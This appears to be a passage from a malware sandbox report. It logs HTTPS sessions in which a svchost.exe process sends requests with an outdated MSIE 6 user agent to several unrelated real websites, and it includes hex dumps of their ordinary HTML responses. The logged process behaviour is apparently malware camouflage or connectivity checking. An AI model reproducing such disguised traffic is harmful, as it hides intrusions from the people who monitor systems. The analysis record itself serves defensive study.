                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:44 UTC221INData Raw: 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63
                                                                                                                                                                                                                                                                                                      Data Ascii: eadyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).conc
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:45 UTC229INData Raw: 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 65
                                                                                                                                                                                                                                                                                                      Data Ascii: 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' repe
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:45 UTC237INData Raw: 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61
                                                                                                                                                                                                                                                                                                      Data Ascii: ipt' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/a
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:45 UTC245INData Raw: 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.uk
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:45 UTC253INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74
                                                                                                                                                                                                                                                                                                      Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-it
                                                                                                                                                                                                                                                                                                      2023-03-22 04:44:45 UTC261INData Raw: 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e 67
                                                                                                                                                                                                                                                                                                      Data Ascii: form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricing


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      15192.168.2.55381935.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC266OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC267INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      SG-F-Cache: HIT
                                                                                                                                                                                                                                                                                                      X-Httpd-Modphp: 1
                                                                                                                                                                                                                                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                                      X-Proxy-Cache: HIT
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC267INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC283INData Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69
                                                                                                                                                                                                                                                                                                      Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC299INData Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d
                                                                                                                                                                                                                                                                                                      Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC315INData Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69
                                                                                                                                                                                                                                                                                                      Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC331INData Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20
                                                                                                                                                                                                                                                                                                      Data Ascii: nbkOX_hlznrdBWHRw" target="_blank" rel="noopener" > <i class="fab fa-youtube" aria-hidden="true"></i> </a> </span> <span class="fl-icon"> <a href="https://www.instagram.com/flamingorecordings/" target="_blank" rel="noopener" > <i class="fab fa-instagram"


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      16192.168.2.553931138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC266OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: diamir.de
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC267INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 162
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC267INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      17192.168.2.55620775.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC266OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: ldh.la.gov
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC333INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 1346
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC334INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                      18192.168.2.55527849.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:06 UTC266OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Accept: *
                                                                                                                                                                                                                                                                                                      Accept-Language: en-us
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      Host: nts-web.net
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1339INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Wed, 22 Mar 2023 04:45:53 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                      Content-Length: 2599149
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                                                      ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1340INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:54 UTC1355INData Raw: 31 36 38 7b 66 69 6c 6c 3a 23 66 35 64 61 32 38 3b 7d 2e 63 6c 73 2d 31 36 30 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a
                                                                                                                                                                                                                                                                                                      Data Ascii: 168{fill:#f5da28;}.cls-160{stroke-width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:
